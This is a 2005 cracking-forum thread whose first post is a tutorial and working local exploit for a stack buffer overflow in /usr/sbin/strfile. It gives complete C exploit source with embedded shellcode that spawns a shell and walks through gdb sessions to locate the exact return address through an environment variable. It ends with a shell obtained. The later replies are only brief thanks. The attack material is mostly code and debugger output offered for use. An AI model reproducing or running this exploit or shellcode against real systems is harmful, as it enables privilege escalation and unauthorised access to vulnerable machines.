Go Back   Xisp.org Forums > Porn Password Cracking > Cracking Tutorials

IpTable

Reply
Views: 1420 - Replies: 4  
Thread Tools Display Modes

IpTable
Old 01-06-2005, 09:12 AM   #1
sPlico
The sPlicster
 
sPlico's Avatar
 
sPlico is offline Offline
Join Date: Jan 2005
Location: Croatia
Posts: 9,486
Threads: 407
sPlico is on a distinguished road
Default IpTable

################################################################################ ########
Exploit HOWTO: Finding EXACT RET address without bruteforcing it and without using NOPs!
################################################################################ ########
|
| #XXXCrackers
|
+--------------------------------------------------------------------------------------+



This paper try to show that the return address can be exactly found without bruteforce it and without using NOPs.
We just fill up an enviroment variable with our shellcode, and we will find the exact address of our enviroment.
RET will be envroment_adrr+strlen(enviroment)+1. Lets see why and how. I will use /usr/sbin/strfile.

xxxcracker@ctb:/home/xxxcracker/work> /usr/sbin/strfile `perl -e 'printf("a"x5000);'`
Segmentation fault
xxxcracker@ctb:/home/xxxcracker/work> gdb /usr/sbin/strfile
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) r `perl -e 'printf("a"x5000);'`
Starting program: /usr/sbin/strfile `perl -e 'printf("a"x5000);'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) i esp ebp eip
Undefined info command: "esp ebp eip". Try "help info".
(gdb) i r esp ebp eip
esp 0xbfffe1c0 0xbfffe1c0
ebp 0xbfffe268 0xbfffe268
eip 0x61616161 0x61616161

Ok. Lets set the current esp as RET. Here is our exploit:
<----------BOF------------->
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>


static char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd"
"\x80\x31\xc0\xfe\xc0\xcd\x80";

#define LEN 5000
#define RET 0xbfffe1c0 /* current esp */

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
printf("\n/usr/sbin/strfile local exploit by xxxcracker\n");
fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;

setenv("xxxcracker",shellcode,1);/* exporting my enviroment, filled up with the shellcode */
execlp("/usr/sbin/strfile","strfile",buffer,NULL); /* executing the binary */
return 0;
}
<---------EOF--------------->

xxxcracker@ctb:/home/xxxcracker/work> ./strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffe1c0
Segmentation fault

Uh. We got a segfault. Lets see why! We fire up gdb:

xxxcracker@ctb:/home/xxxcracker/work> gdb strfilex
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) r
Starting program: /home/xxxcracker/work/strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffe1c0

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001e10 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbfffe1c0 in ?? ()

Uh. We got nothing. Nothing at 0xbfffe1c0. Lets search for our enviroment:

(gdb) x/s $ebp+1000
0xbfffe620:
" "...
(gdb)
0xbfffe6e8:
" "...
(gdb)
0xbfffe7b0:
" "...
...
...
(hit enter until you see:)
0xbfffff8e: "SSH_TTY=/dev/pts/3"
(gdb)
0xbfffffa1: "LC_COLLATE=POSIX"
(gdb)
0xbfffffb2: "xxxcracker=11\027\20011.\2001Rhn/shh//bi\211RS\2111\013\2001\200" <-- BINGO! Here is
our enviroment!
(gdb)
0xbfffffea: "/usr/sbin/strfile"
(gdb)
0xbffffffc: ""

So, our env is at 0xbfffffb2. We must skip the string "xxxcracker=" to poit directly to our shellcode. The string
"xxxcracker=" is 8 bytes long, so we will add 8 bytes to 0xbfffffb2.
Here is our new exploit:

<------BOF------>

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>


static char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd"
"\x80\x31\xc0\xfe\xc0\xcd\x80";

#define LEN 5000
#define RET 0xbfffffb2+8

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
printf("\n/usr/sbin/strfile local exploit by xxxcracker\n");
fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;

setenv("xxxcracker",shellcode,1);
execlp("/usr/sbin/strfile","strfile",buffer,NULL);
return 0;
}

<---------EOF------>

Now, lets try it!

xxxcracker@ctb:/home/xxxcracker/work> gcc -o strfilex strfilex.c
xxxcracker@ctb:/home/xxxcracker/work> ./strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffffba
sh-2.05$

Whoaaaaaaa! Cool! First try! No NOPs, no bruteforce!

iptable@unixcode.net
  Reply With Quote

Old 01-25-2005, 02:28 PM   #2
lazo
Guest
 
Posts: n/a
Threads: 5107
Default

thank you m8 for the information
  Reply With Quote

Old 04-14-2005, 04:03 PM   #3
toniii
Guest
 
Posts: n/a
Threads: 5107
Default

Very good info!! Thanks for the share.
  Reply With Quote

Old 04-14-2005, 10:56 PM   #4
slysnake
Cheshire Cat
 
slysnake's Avatar
 
slysnake is offline Offline
Join Date: Jan 2005
Posts: 5,507
Threads: 315
slysnake is on a distinguished road
Default

I like the way you fit xxxcracker into this. ;)
__________________
"How do you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
  Reply With Quote

Old 04-15-2005, 01:42 AM   #5
ToRaZ
Special Friend
 
ToRaZ's Avatar
 
ToRaZ is offline Offline
Join Date: Jan 2005
Posts: 2,220
Threads: 259
ToRaZ is on a distinguished road
Default

yes...very very good info indeed : )
what was it all about ?
__________________
Forgive, O Lord, my little jokes on Thee And I'll forgive Thy great big one on me. --Robert Frost
  Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump



All times are GMT -4. The time now is 12:35 AM.


vBulletin skin developed by: Xisp.org Crew
Powered by vBulletin®
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
2005 Copyright Xisp.org